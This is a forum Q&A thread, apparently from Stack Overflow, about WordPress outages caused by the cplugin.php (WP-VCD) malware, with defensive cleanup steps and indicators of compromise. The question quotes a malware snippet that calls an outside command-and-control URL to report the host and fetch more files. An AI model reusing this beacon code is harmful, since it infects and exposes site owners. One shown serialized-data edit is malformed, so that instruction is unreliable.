wordpress website 500 error and outages due to cplugin.php file malware

Question

There is a recent attack where numerous wordpress websites are taken down due to a file cplugin.php which is a malware.

The malware is bad written code so for now it is mostly causing 500 server runtime error. But its better to delete it immediately as it migrate to all multiple website on the server and has code to hit a malware url to download additional files. A snippet of the malware code:

if(get_option('log_install') !=='1')
{
    if(!$log_installed = @file_get_contents("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
    $log_installed = @file_get_contents_cplugin("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}

I have figured out a solution and posting the answer myself to help all users out there.

Edit:

There are reports of the same file being named differently for users: ccode.php, cplugin.php and helad.php in which case the fix can be modified.

Mustafa sabir · Accepted Answer · 2020-08-26T17:49:02.717

This seems like some sort of global attack. There is a file cplugin.php in the plugins folder which is causing the downsite. Deleting the file is of no use as it re-appears. Also it will infect all other sites on a multi website server. Fortunately after working for hours have figured out the fix. Please read this carefully to fix your site:

Backup your database and files
Edit your wp_options table, find the property active_plugins and edit it, you will see it has a plugin entry for cplugin.php. We have to delete it. Your initial data will look something like this:

a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;s:11:"cplugin.php";i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....

Edit this to remove the cplugin.php entry , start from i upto the next ; and remove that. (Make sure you Database it backed up incase you make some mistake). The new entry without the cplugin.php will look like:

a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....

Follow this step similarly for the field in wp_option table named site_transient_update_plugins

before: O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:11:"cplugin.php";s:3:"1.0";s:32:"duplicate-page/duplicatepage.php";.....

after: O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:32:"duplicate-page/duplicatepage.php";.....

After updating your fields, navigate back to your main plugins folder /wp-content/plugins and delete the file cplugin.php
Login to your wordpress dashboard and re activate all your plugins

Voila you have fixed your website.

I think the technical reason for this would be that the malware registers itself as a wordpress plugin which automatically replaces the file upon deletion. Fortunately the malware is badly written code so instead of running it mostly throws 500 error. But in anycase I would recommend to delete it immediately incase it updates.

Edit: According to the wordpress forum thread on this topic, for some users simply renaming the file also makes the website work, which is probably due to the fact that renaming files in wordpress deactivates the plugin, due to which websites start working. But I would not keep infected files renamed and stored in anycase, so would recommend the 1st solution atleast after gaining access to the site.

thanks for this, i did some changes to the database and it broke my site - hopefully it comese backup ok when i import the old backup i have :) — Naveen DINUSHKA, Aug 29 '20 at 02:43

score 2 · Answer 2 · answered Aug 30 '20 at 18:24

This is not attack, but malware included with nulled plugin or theme you downloaded and installed yourself. It is updated version of WP-VCD - WordFence has a whitepaper with all details about that in WP-VCD: The Malware You Installed On Your Own Site, perhaps we should call it "WP-VCD Reloaded" :)

Indicators of Compromise are plugin files named ccode.php, cplugin.php, helad.php, and mplugin.php (and admin_ips.txt) in wp-content/plugins and plugins / themes with file class.plugin-modules.php or class.theme-modules.php somewhere in their folder.

Cleaning up

Find the plugin or theme with malware in class.plugin-modules.php or class.theme-modules.php and delete the plugin or theme (if you need it - purchase it from official source).
Delete the malware plugin(s): ccode.php, cplugin.php, helad.php or mplugin.php.
Repeat it for all sites under same hosting account / server.

Installation procedure does seem to touch wp-includes/functions.php, but it only tries to remove malware so this is perhaps part of some upgrade from previous malware version.

Yes but if you read the wordpress forums people have experienced it since last week mostly. Maybe they recently updated the malware and re released it. So calling it an attack would not be wrong :) Also some of my clients had problem who had no nulled theme or plugin installed. It was a single website server with genuine purchased and updated theme and plugins. Also the latest wordpress version. I personally also never use nulled themes/plugins. I think this is something else.... need to dig deeper. — Mustafa sabir, Aug 30 '20 at 19:28
WordPress forum posts are related to apparent bug in malware - cplugin.php tries to update itself on each run, so there was buggy code on c2 (command&control) servers that was presumably distributed week ago to sites that already had the malware installed and started throwing errors. I have been tracking this nulled themes group for some years, so I have dug pretty deep. Working for hosting provider and despite hundreds of infections still not found a case that is not traceable to nulled theme. — petskratt, Aug 31 '20 at 06:18

score 0 · Answer 3 · answered Aug 27 '20 at 03:45

0

There was no entry in the db on our sites but the call codes were added to the bottom of functions.php in the wp-includes folder. Removing the offending call and the sites popped right up. :)

answered Aug 27 '20 at 03:45

mark

1

Thanks for the inputs. Are you sure it was the cplugin attack? Because wordpress has many other types of malware too. Usually most of them show similar behaviour of making calls to some malicious website to download files and scripts or for forced redirection. In any case I would recommend strict file permissions setup and wordfence security plugin for better safety. – Mustafa sabir Aug 27 '20 at 09:15

score 0 · Answer 4 · answered Aug 27 '20 at 07:03

0

In the wp-content folder file called cplugin.php and helad.php in which case the fix can be modified. delete it immediately as it migrates to all multiple websites on the server and has code to hit a malware URL to download additional files.

answered Aug 27 '20 at 07:03

Ravinder

1
1

score 0 · Answer 5 · answered Aug 31 '20 at 19:45

You used theme or plugin null.

Please come here to scan the theme: https://themecheck.info/
This is my theme: https://themecheck.info/score/wordpress-theme-goto-shared-by-wptry-org.html
They added files class.theme-modules.php in multiple directories, and added the code to the functions.php file

wordpress website 500 error and outages due to cplugin.php file malware

5 Answers5